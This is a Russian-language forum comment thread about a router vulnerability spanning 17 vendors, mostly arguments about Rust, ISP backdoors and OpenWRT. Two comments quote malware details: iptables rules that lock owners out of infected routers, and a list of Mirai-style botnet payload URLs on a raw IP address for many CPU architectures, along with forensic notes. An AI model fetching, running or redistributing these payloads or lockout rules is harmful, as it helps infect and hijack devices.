62. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (62), 09-Авг-21, 13:35 
Это математически невозможно в 100 раз.
Ответить | Правка | Наверх | Cообщить модератору

70. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 14:03 
Если взять сишный архиватор Бабушкина - то вполне.
Ответить | Правка | Наверх | Cообщить модератору

60. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +4 +/
Сообщение от Аноним (32), 09-Авг-21, 13:34 
какой жирный тролль!

прошивка на расте в IP-камеры - лезет https://habr.com/ru/company/erlyvideo/blog/334912/, значит и в роутер пятилетней давности влезет.

настолько надёжно, насколько генерит бинарный код LLVM
и никто вам ничего не "обещает". берёшь, собираешь, запускаешь. работает - в 99.99+% случаев, иначе разбираешься или пишешь на bugs.llvm.org

получится. раст обеспечивает обратную совместимость кода, а если ломает - то это документируется
https://doc.rust-lang.org/stable/rust-by-example/compatibili...

Ответить | Правка | К родителю #38 | Наверх | Cообщить модератору

63. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (62), 09-Авг-21, 13:35 
npm c node.js тоже много чего обещает. Только ничего не работает потом.
Ответить | Правка | Наверх | Cообщить модератору

67. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (291), 09-Авг-21, 13:58 
Нода - это как сишечка. Стильно, круто, олдскульно. Никакого смузи.
Так что не в ту сторону воюете.
Ответить | Правка | Наверх | Cообщить модератору

105. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (62), 09-Авг-21, 15:39 
Это ж сколько тебе лет что надо это олдскульно 7 лет?
Ответить | Правка | Наверх | Cообщить модератору

144. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 17:58 
> Нода - это как сишечка. Стильно, круто, олдскульно. Никакого смузи.

Нода? Как сишечка? Да ты упрлс.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

80. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –6 +/
Сообщение от Урри (ok), 09-Авг-21, 14:23 
какой глюпый аноним!

> прошивка на расте в IP-камеры - лезет https://habr.com/ru/company/erlyvideo/blog/334912/, значит и в роутер пятилетней давности влезет.

Не прошивка на расте, а аж целый самописный стример, который
1) существенно проще веб-сервера
2) по утверждению самого же автора, цитирую: "Целая пачка unsafe кода, автогенеренного из сишного кода SDK с помощью bindgen, подпатченый биндинг к libc (постараемся залить патч в апстрим) и дальше реализация RTSP на tokio."

Зачем им раст дался при таких раскладах - непонятно.

Но, впрочем, ладно - самописный сервер на расте можно засунуть. Пункт 1 зачеркиваем.

> настолько надёжно, насколько генерит бинарный код LLVM

Эммм, Аноним не понимает разницу между компиляцией и выполнением кода? Ну тут даже комментировать нечего.

> и никто вам ничего не "обещает". берёшь, собираешь, запускаешь. работает - в 99.99+% случаев, иначе разбираешься или пишешь на bugs.llvm.org

Вот она - жизнь растофанатика. Вместо "написал и работает, десятилениями" он "берёшь, собираешь, запускаешь - если повезло, все ок; если нет - багрепорт и жди исправлений".

Сочувствую (хотя на самом деле - нет).

> раст обеспечивает обратную совместимость кода, а если ломает - то это документируется

Буа-ха-ха-ха-ха-ха. Раст обеспечивает, но не обеспечивает - об этом, правда, обязательно сообщает.

И ты такой "Фух, какие же они молодцы, что рассказали - пойду быстренько все свои программы за последних 15 лет переделаю".


Блииин, просто крылатая фраза, "раст обеспечивает обратную совместимость кода, а если ломает - обязательно сообщает". Я ее буду вставлять каждый раз, когда очередной "вы мне объясните" будет спрашивать "а что с растом то не так, чего все агрятся?".

"Раст обеспечивает обратную совместимость кода, а если ломает - обязательно сообщает". Эта пять. Хахахахахах, не могу успокоиться.

Ответить | Правка | К родителю #60 | Наверх | Cообщить модератору

147. Скрыто модератором  –1 +/
Сообщение от Аноним (-), 09-Авг-21, 18:05 
Ответить | Правка | Наверх | Cообщить модератору

92. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (52), 09-Авг-21, 14:58 
Конечно лезет. Заодно LLVM с собой тащит.

> Страница не найдена
>Страница устарела, была удалена или не существовала вовсе

Ответить | Правка | К родителю #60 | Наверх | Cообщить модератору

99. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (99), 09-Авг-21, 15:16 
Запятую в конце удали.

А вообще по ссылке к обычной прошивке добавили стример на расте, являющийся, цитирую(!):

"Целая пачка unsafe кода, автогенеренного из сишного кода SDK с помощью bindgen, подпатченый биндинг к libc (постараемся залить патч в апстрим) и дальше реализация RTSP на tokio."

Ответить | Правка | Наверх | Cообщить модератору

113. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 16:45 
> Конечно лезет. Заодно LLVM с собой тащит.

Чего и куда тащит? "Огласите весь список, пжста!"(с)

Ответить | Правка | К родителю #92 | Наверх | Cообщить модератору

115. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –3 +/
Сообщение от Аноним (52), 09-Авг-21, 16:52 
Угадал, это как раз из советского репертуара "..и в землю закопал.". Чего спорить с сумасшедшим коли ссылка нерабочая?
Ответить | Правка | Наверх | Cообщить модератору

131. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (131), 09-Авг-21, 17:18 
>> Конечно лезет. Заодно LLVM с собой тащит.
> Угадал, это как раз из советского репертуара "..и в землю закопал.".

Пересказ твоего спора с голосами в твоей голове мне не очень интересен.
Повторю вопрос: что и куда тащит LLVM?
> Чего спорить с сумасшедшим коли ссылка нерабочая?

Твои виляния жопой и отмазки в "классическом опеннетном стиле" - тоже.


Ответить | Правка | Наверх | Cообщить модератору

222. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (222), 10-Авг-21, 02:14 
А чего разве большой обьем на выходе? Вроде транслирует все тот же LLVM.
Ответить | Правка | К родителю #38 | Наверх | Cообщить модератору

71. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +6 +/
Сообщение от anonymous (??), 09-Авг-21, 14:04 
И даже тут надо обязательно какашку в Rust кинуть. Как же без этого? Такое ощущение, что комментаторы любую новость сводят в обсирание Rust.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

79. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +4 +/
Сообщение от Аноним (291), 09-Авг-21, 14:21 
Есть сильное подозрение, что уязвимый код, про который речь в этой новости, был написан не на Rust.

А это уже вина Rust - почему какой-то код на нем не написан?

Ответить | Правка | Наверх | Cообщить модератору

96. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от Аноним (52), 09-Авг-21, 15:00 
То есть ржавый не подходит для написания кода ржавого, но это не вина ржавого? Вам бы премию дали за особенности в развитии.
Ответить | Правка | Наверх | Cообщить модератору

126. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 17:16 
Не совсем. Ржавый не подходит для замены кода на Си, потому что на нём плохо реализованы ошибки работы с памятью.
Ответить | Правка | Наверх | Cообщить модератору

129. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (291), 09-Авг-21, 17:18 
Одни в принципе не воспроизводятся, другие требуют явного указания unsafe, что нарушает главное свойство хорошей ошибки (она должна быть незаметной).
Ответить | Правка | Наверх | Cообщить модератору

89. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Брат Анон (ok), 09-Авг-21, 14:57 
Чо ты так переживаешь. Я гошник/питонер, и я минус не ставил. Так как немного есть разница между либой и языком. В либах всякое бывает, да. Язык тут не причём. Хотя я ржавого на дух не переношу.
Ответить | Правка | К родителю #71 | Наверх | Cообщить модератору

255. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 10-Авг-21, 14:13 
Если у языка либа не вынесена в отдельную независимую сущность, тогда CVE неизбежно улетает языку. А какие еще варианты? Сказать что ложки^W CVE нет? :))
Ответить | Правка | Наверх | Cообщить модератору

259. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Рукалицо (?), 10-Авг-21, 14:49 
> Если у языка либа не вынесена в отдельную независимую сущность, тогда

Ести аноним несет отдельный, независимый бред, тогда ...

Ответить | Правка | Наверх | Cообщить модератору

286. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:11 
> Если у языка либа не вынесена в отдельную независимую сущность

То этот язык угоден Оккаму.

Ответить | Правка | К родителю #255 | Наверх | Cообщить модератору

313. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 11-Авг-21, 15:54 
> То этот язык угоден Оккаму.

Скорее, его бритве. Но это все же не отвечает на вопрос куда в этом случае деть CVE кроме самого ЯП.

Ответить | Правка | Наверх | Cообщить модератору

151. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (151), 09-Авг-21, 18:13 
Обязательно нужно сбалансировать неуёмный растопиар, иначе у неокрепших умов может сложиться впечатление, что раст безопасный язык.
Ответить | Правка | К родителю #71 | Наверх | Cообщить модератору

164. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 09-Авг-21, 19:17 
> Обязательно нужно сбалансировать неуёмный растопиар, иначе у неокрепших умов может сложиться
> впечатление, что раст безопасный язык.

Безопасность безопасностью, а 256 CVE уже влепили. Хотя нет, уже как минимум 257, с учетом свежей новости про либу и айпишники.

Ответить | Правка | Наверх | Cообщить модератору

177. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 09-Авг-21, 20:36 
Богато. А у сишных подeлий счёт уже за миллион перевалил, наверное. Или миллиард?
Ответить | Правка | Наверх | Cообщить модератору

185. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 21:00 
Ну, если учесть что софта на хрусте никто толком не видел в диком виде...
Ответить | Правка | Наверх | Cообщить модератору

7. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от InuYasha (??), 09-Авг-21, 11:19 
>>многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки.

Так точно. Видел многократно. Вернее, у домашних Быдлайнов (лажа) и Ростелегомов (дно), МГТСов (днище) такое повсеместно (особенно GovnoPON). Самое пика-пика-нтное, что, даже если поменяешь пароли на админку, для прова есть секретная админка. Но, даже если поменяешь пароль и на неё (а это не всегда возможно), то - сюрприз-сюрприз! - ротор сбросят и перепрошьют всё равно. :3

Ответить | Правка | Наверх | Cообщить модератору

11. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +11 +/
Сообщение от OnTheEdge (ok), 09-Авг-21, 11:35 
> у домашних Быдлайнов

гиги за дыры

> Ростелегомов

больше возможностей для эксплуатации дыр


> МГТСов

не дыра, а ДЫРИЩЕ!

Ответить | Правка | Наверх | Cообщить модератору

103. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (103), 09-Авг-21, 15:33 
Это фича, карманный ботнет.
Ответить | Правка | Наверх | Cообщить модератору

238. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 10-Авг-21, 11:33 
> Это фича, карманный ботнет.

Мегафно: тебя выпер с роутера вирус. Потому что ты крутой!

Ответить | Правка | Наверх | Cообщить модератору

292. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:31 
Это вирус-саппортер, он помогает оператору заботиться о пользователях!
Ответить | Правка | Наверх | Cообщить модератору

149. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от pofigist (?), 09-Авг-21, 18:11 
>  Но, даже если поменяешь пароль и на неё (а это не всегда возможно), то - сюрприз-сюрприз! - ротор сбросят и перепрошьют всё равно. :3

Если ты ПЕРЕД сменой пароля не озаботился отключением TR-069, то это ТВОИ проблемы, а не роутера или провайдера...

Ответить | Правка | К родителю #7 | Наверх | Cообщить модератору

223. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от kissmyass (?), 10-Авг-21, 02:31 
переводите роутер в режим моста и ставьте свой роутер на вход, так делают все вменяемые ребята

я бы ставил что-то типа микрота

Ответить | Правка | К родителю #7 | Наверх | Cообщить модератору

288. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:19 
> я бы ставил что-то типа микрота

Да, если у нас в критичном месте стоит проприетарщина, самое логичное решение - поставить вторую проприетарщину.

Ответить | Правка | Наверх | Cообщить модератору

318. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от kissmyass (?), 11-Авг-21, 17:47 
>> я бы ставил что-то типа микрота
> Да, если у нас в критичном месте стоит проприетарщина, самое логичное решение
> - поставить вторую проприетарщину.

ну если хочешь, то собирай прошивку сам и используй OpenWRT-совместимый комбайн

ты можешь получить сырцы микрота, но опенсорсом это не назовешь

по-крайней мере это киска дорогая и не убикюити который тоже дороже, так еще и открыто анальный зонд пихает

Ответить | Правка | Наверх | Cообщить модератору

328. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 12-Авг-21, 14:06 
Если микротик хочет продолжать продажи на американском и европейском рынке, ему тоже придётся перенести управление устройствами пользователей в облако в американской юрисдикции. Пытаться игнорировать требования ФБР - себе дороже. Убики и atlassian уже прогнулись.
Ответить | Правка | Наверх | Cообщить модератору

339. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от kissmyass (?), 12-Авг-21, 22:55 
> Если микротик хочет продолжать продажи на американском и европейском рынке, ему тоже
> придётся перенести управление устройствами пользователей в облако в американской юрисдикции.
> Пытаться игнорировать требования ФБР - себе дороже. Убики и atlassian уже
> прогнулись.

а пруфы будут? )) обоcрался пока только убик, и насколько я знаю это его личная инициатива, телеметрии им бладь мало

Ответить | Правка | Наверх | Cообщить модератору

12. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –7 +/
Сообщение от Аноним (12), 09-Авг-21, 11:40 
Неужели кто то использует эти железки без прошивки на openvrt?!
Ответить | Правка | Наверх | Cообщить модератору

31. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +30 +/
Сообщение от Абвгдейка (?), 09-Авг-21, 12:32 
Никто не использует.
В магазах обычно 2 очереди, одна за роутерами, вторая - перепрошиватся на OpenWRT.
Если заказывать роутер через инет, то магаз за свой счет перепрошивает и присылает перепрошитый.
Далее к этому роутеру прикрепляется специальный индиго-разрабоадмин который тщательно каждый день отслеживает новости об уязвимостях в OpenWRT и в случае обнаружения оной немедленно фиксит и накатывает апдейт.
Кстати, забыл сказать, что в любой магазе в отделе роутеров висит большой мигающий плакат с надписью: "Уважаемые покупатели, после покупки роутера рекомендуем незамедлительно перепрошить его на OpenWRT".
Ответить | Правка | Наверх | Cообщить модератору

39. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 12:52 
Подтверждаю, а те, кому провайдер дал роутер, под который нету прошивки DD-RWT (и которые вообще невозможно своими ручками обновить), сразу выкидывают его и бегут покупать новый с DD-RWT. Пароли ставят надёжные, Telnet и UPnP отключают. Ага.
Ответить | Правка | Наверх | Cообщить модератору

294. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 11-Авг-21, 11:29 
Наш человек ни за что не купит нормальный роутер, если пров дал бесплатный.
Ответить | Правка | Наверх | Cообщить модератору

309. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (309), 11-Авг-21, 14:48 
Только не надо гнать на СНГ. Люди вообще далеки от технологий, компьютеров, прошивок, уязвимостей, обновлений и прочего. Дали, работает эта коробочка, светятся лампочки, ютубчик работает и нормально. Так и думают, сидят на семёрке, пока не клюнет.
Ответить | Правка | Наверх | Cообщить модератору

329. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 12-Авг-21, 14:12 
Ну, люди везде плюс-минус одинаковые. Это квасные патриоты говорят "только наш человек может <что-то крутое>", а смердяковы - "только наш человек может <что-то позорное>".
Иллюзия быстро исчезает, если помотаться по миру и пообщаться с людьми.
Ответить | Правка | Наверх | Cообщить модератору

40. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от LeNiN (ok), 09-Авг-21, 12:52 
Подскажите координаты вашей параллельной вселенной, хочу жить там :)
Ответить | Правка | К родителю #31 | Наверх | Cообщить модератору

42. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 12:57 
Аноним (12) уже там живёт, а мы пока только фантазируем.
Ответить | Правка | Наверх | Cообщить модератору

44. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 09-Авг-21, 13:00 
И ещё не забудьте про WPA-TKIP, и если особо повезёт, WEP
Ответить | Правка | Наверх | Cообщить модератору

188. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:08 
> И ещё не забудьте про WPA-TKIP, и если особо повезёт, WEP

А разве WPA-TKIP полностью сломали? Там вроде только относительно бесполезные атаки есть?

Ответить | Правка | Наверх | Cообщить модератору

261. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 17:52 
Вообще-то нет, есть и значимые атаки. NOMORE - атака на шифр RC4 в основе WPA-TKIP, WEP и нашумевший KRACK. Вторую поправили программно на большинстве устройств, а первая неустранима, позволяет расшифровывать и подделывать данные, передаваемые WiFi.
Ответить | Правка | Наверх | Cообщить модератору

319. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от vitektm (?), 11-Авг-21, 17:47 
ну фиг знает я wep не видел вживую лет 6-8 если не больше.
Больше шанс найти без пароля
Ответить | Правка | Наверх | Cообщить модератору

94. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Брат Анон (ok), 09-Авг-21, 15:00 
Гравицапу подаришь -- скажу.

Я пока надень цак, дорогой.

Ответить | Правка | К родителю #40 | Наверх | Cообщить модератору

93. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Брат Анон (ok), 09-Авг-21, 14:58 
А меня даже оштрафовали за отказ приви.... перепрошивать роутер.
Ответить | Правка | К родителю #31 | Наверх | Cообщить модератору

102. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (-), 09-Авг-21, 15:22 
> за отказ приви....

За этим вам не сюда.

Ответить | Правка | Наверх | Cообщить модератору

121. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Kuromi (ok), 09-Авг-21, 17:06 
Это ADSL оборудование, акие железки далеко не всегда можно перепрошить без потери основной функциональности.
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

152. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +3 +/
Сообщение от pofigist (?), 09-Авг-21, 18:14 
> далеко не всегда можно перепрошить без потери основной функциональности.

Вообще-то их обычно нельзя перепрошить. Вообще.

Ответить | Правка | Наверх | Cообщить модератору

189. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 21:08 
Почему же, из Калашникова - можно.

Ответить | Правка | Наверх | Cообщить модератору

322. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Kuromi (ok), 11-Авг-21, 21:11 
>> далеко не всегда можно перепрошить без потери основной функциональности.
> Вообще-то их обычно нельзя перепрошить. Вообще.

Ну например ситуация с устройсвами с встроенным SIP адаптером - роутерная часть шьется, телефония теряется.

Ответить | Правка | К родителю #152 | Наверх | Cообщить модератору

13. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (13), 09-Авг-21, 11:42 
Опять никакого уважения к пользователям зюзерутеров, могля бы и для КДЕ эксплоитов занести.
Ответить | Правка | Наверх | Cообщить модератору

15. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от господин полковник АНБ (?), 09-Авг-21, 11:50 
Такие уязвимости намекают о необходимости перепрошивать роутеры в OpenWRT.
Ответить | Правка | Наверх | Cообщить модератору

153. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от pofigist (?), 09-Авг-21, 18:17 
Ничего что это можно сделать для заветного 1% всех моделей мыльниц на рынке?

И при этом adsl, gpon, docsis и т.д. в этот 1% - гарантировано не попадают? А это - 80+% всех абонентских терминалов...

Ответить | Правка | Наверх | Cообщить модератору

157. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 18:43 
> И при этом adsl, gpon, docsis и т.д. в этот 1% -
> гарантировано не попадают? А это - 80+% всех абонентских терминалов...

Тогда эта штука подарит тебе приятные бонусы. Например, такие:
iptables -F
iptables -A INPUT -p tcp --dport 22 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp --dport 8080 -j DROP
iptables -A INPUT -p tcp --dport 9000 -j DROP
iptables -A INPUT -p tcp --dport 8089 -j DROP
iptables -A INPUT -p tcp --dport 7070 -j DROP
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 9090 -j DROP
iptables -A INPUT -p tcp --dport 161 -j DROP
iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp --dport 9600 -j DROP
iptables -A INPUT -p tcp --dport 21412 -j DROP

...после этого ты на свой роутер уже не попадешь, он уже не твой :)

Ответить | Правка | Наверх | Cообщить модератору

234. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от господин полковник АНБ (?), 10-Авг-21, 10:49 
Роутеры без возможности перепрошивки в OpenWRT покупать безответственно.
Нельзя полагаться на прошивку (блоб) производителя.
А оборудование ADSL или GPON нужно настраивать в бридж (bridge), за которым ставить "правильный" роутер.  
Иначе, полагаться на производителя, когда тот смилостивиться обновить прошивку с исправлением текущих уязвимостей.
Ответить | Правка | К родителю #153 | Наверх | Cообщить модератору

267. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от pofigist (?), 10-Авг-21, 20:17 
Для начала - заветные 80+% мыльниц не покупаются пользователем, они выдаются ему его провайдером.

Далее - далеко не любую мыльницу можно загнать в режим бриджа. Это кстати одна из причин почему у меня не GPON. С ADSL кстати все гораздо проще - поставил модуль в маршрутизатор и всё работает. А вот с GPON - так уже не прокатит. С DOCSIS вроде тоже, но не уверен - меня бог миловал иметь дело с этим чудом...

Ну я уж и не говорю что LuCi - не для обычного юзверя...

Ответить | Правка | Наверх | Cообщить модератору

300. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 13:25 
> Для начала - заветные 80+% мыльниц не покупаются пользователем, они выдаются ему его провайдером.

А еще говорят что 95% людей - идиоты. Вирус чем-то таким и пользуется, пролезая между первым и вторым. Технически там нет ничего необычного. Обычное использование дураков и пофигистов в хвост и в гриву.

Ответить | Правка | Наверх | Cообщить модератору

323. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от pofigist (?), 11-Авг-21, 22:35 
Вопрос даже не в лени, а в том что на тот же GPON ты просто не поставишь свой роутер. Ну вот в принципе - только провайдерский.
А его соответственно - далеко не всегда можно загнать в режим бриджа...
А если тебе повезло и тебе дали старую модель, где это можно - тебе просто никто не даст его пароль - придется сбрасывать и подбирать настройки. А это - бывает не просто. Особенно если мыльница - брендирована провайдером, а она обычно брендирована...
Ну и вишенка на торте - это нарушение договора, со всеми вытекающими.
Ответить | Правка | Наверх | Cообщить модератору

16. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от ryoken (ok), 09-Авг-21, 11:51 
>> ботнету Mirai

Mirai это вроде по-японски "будущее" ?

Ответить | Правка | Наверх | Cообщить модератору

18. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (52), 09-Авг-21, 11:55 
Ага, 未来 будущее/грядущее.
Ответить | Правка | Наверх | Cообщить модератору

158. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 18:45 
> Mirai это вроде по-японски "будущее" ?

Ну да. И к тому были причины. Примерно такие:
http://212.192.241.72/bins/dark.x86
http://212.192.241.72/bins/dark.mips
http://212.192.241.72/bins/dark.mpsl
http://212.192.241.72/bins/dark.arm4
http://212.192.241.72/bins/dark.arm5
http://212.192.241.72/bins/dark.arm6
http://212.192.241.72/bins/dark.arm7
http://212.192.241.72/bins/dark.ppc
http://212.192.241.72/bins/dark.m68k
http://212.192.241.72/bins/dark.sh4

И ему вроде даже версия либ похрен, всеядная зараза.

А вот немного бонусов форенсикам...
1) ARM версия пакована UPX. Нормально снимается обычным UPX.
2) ARMv7 вредитель билдил в /home/landley/aboriginal/aboriginal/build/temp-armv7l/build-gcc/ (ARMv7)
3) GCC ископаемый, 4.2.1 заявлен для ARMv7.

p.s. там кстати и x86_64 версия есть, но в скрипте баг. Или вредитель специально испортил чтобы себя своим творением не поиметь.

Ответить | Правка | К родителю #16 | Наверх | Cообщить модератору

257. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 14:29 
Кстати landley и aboriginal - это https://github.com/landley/aboriginal

Некая достаточно кастомная билдсистема. Автор что-то делал для марсианского вертолетика и врядли сам имеет отношение к раздаче вирусов.

Ответить | Правка | Наверх | Cообщить модератору

273. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от пох. (?), 10-Авг-21, 21:52 
> Кстати landley и aboriginal - это https://github.com/landley/aboriginal
> Некая достаточно кастомная билдсистема.

кросстулза для сборки не под свой процессор.

The build supports most architectures QEMU can emulate (x86, arm, powerpc, mips, sh4, sparc...)
отсюда и странный набор - я его слепила что готовым было.

Эх, сломали горшочек, сдох тот сервак. Не успел я себе скачать полезных и нужных бинарников.

Ответить | Правка | Наверх | Cообщить модератору

302. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 13:40 
> кросстулза для сборки не под свой процессор.

Я так понял что затеяно это было как мини линух способный собирать себя, с изучением насколько можно обрубить чтобы оставить минимум программ. Реально минималистская штука, однако способная компилять. За что видимо и попал в милость к тем.

Оригинал вообще вроде некоторые части как standalone делал кроссом. Собирая подобие libc из сисколов напрямую. Забавный пример кроссового программинга. А ты гришь, stable api nonsense...

> отсюда и странный набор - я его слепила что готовым было.

Ну я так и понял что хацкеры его поюзали за то что это минимальный линух в котором можно собрать вон те щтуки.

> Эх, сломали горшочек, сдох тот сервак. Не успел я себе скачать полезных и нужных бинарников.

Ага, сдох. А чего в них полезного? В них тот сервак захардкожен. Ты ж к нему доступа не имеешь все-равно, ну и толку с него? Я хотел прочекать не лоханулся ли хаксор в x86 бинаре но не успел. Так что это останется загадкой.

Ответить | Правка | Наверх | Cообщить модератору

306. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от пох. (?), 11-Авг-21, 14:17 
> Я так понял что затеяно это было как мини линух способный собирать себя,

ну как видишь, не только себя.

> Ну я так и понял что хацкеры его поюзали за то что это минимальный линух в котором можно
> собрать вон те щтуки.

ну да, причем не надо ничего особо уметь, все в хомяк, все в хомяк.
Оно банально в куеме потом запускается, с шеллом.

> Ага, сдох. А чего в них полезного?

ну вот и посмотреть, чего. Мне интересней были образы для армов и мипса - раз ботнет живой, они-то точно были работающие.

Ответить | Правка | Наверх | Cообщить модератору

314. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 11-Авг-21, 16:26 
> ну как видишь, не только себя.

Ну да, еще, вот, небольшую примочку, чего б ему не, с компилером который линух ворочает. Это же объясняет винтажность компилера. У автора абориген линукса аллергия на GPLv3, он GCC 4.2 до упора юзал. Его то я и увидел.

> ну да, причем не надо ничего особо уметь, все в хомяк, все в хомяк.
> Оно банально в куеме потом запускается, с шеллом.

Ну я так и понял что его унутрях линуха под соотв проц компиляли. Вообще на сетап этого я бы посмотрел. Как выглядит бут линя под m68k под qemu я лично ни разу в жизни не видел.

> ну вот и посмотреть, чего. Мне интересней были образы для армов и
> мипса - раз ботнет живой, они-то точно были работающие.

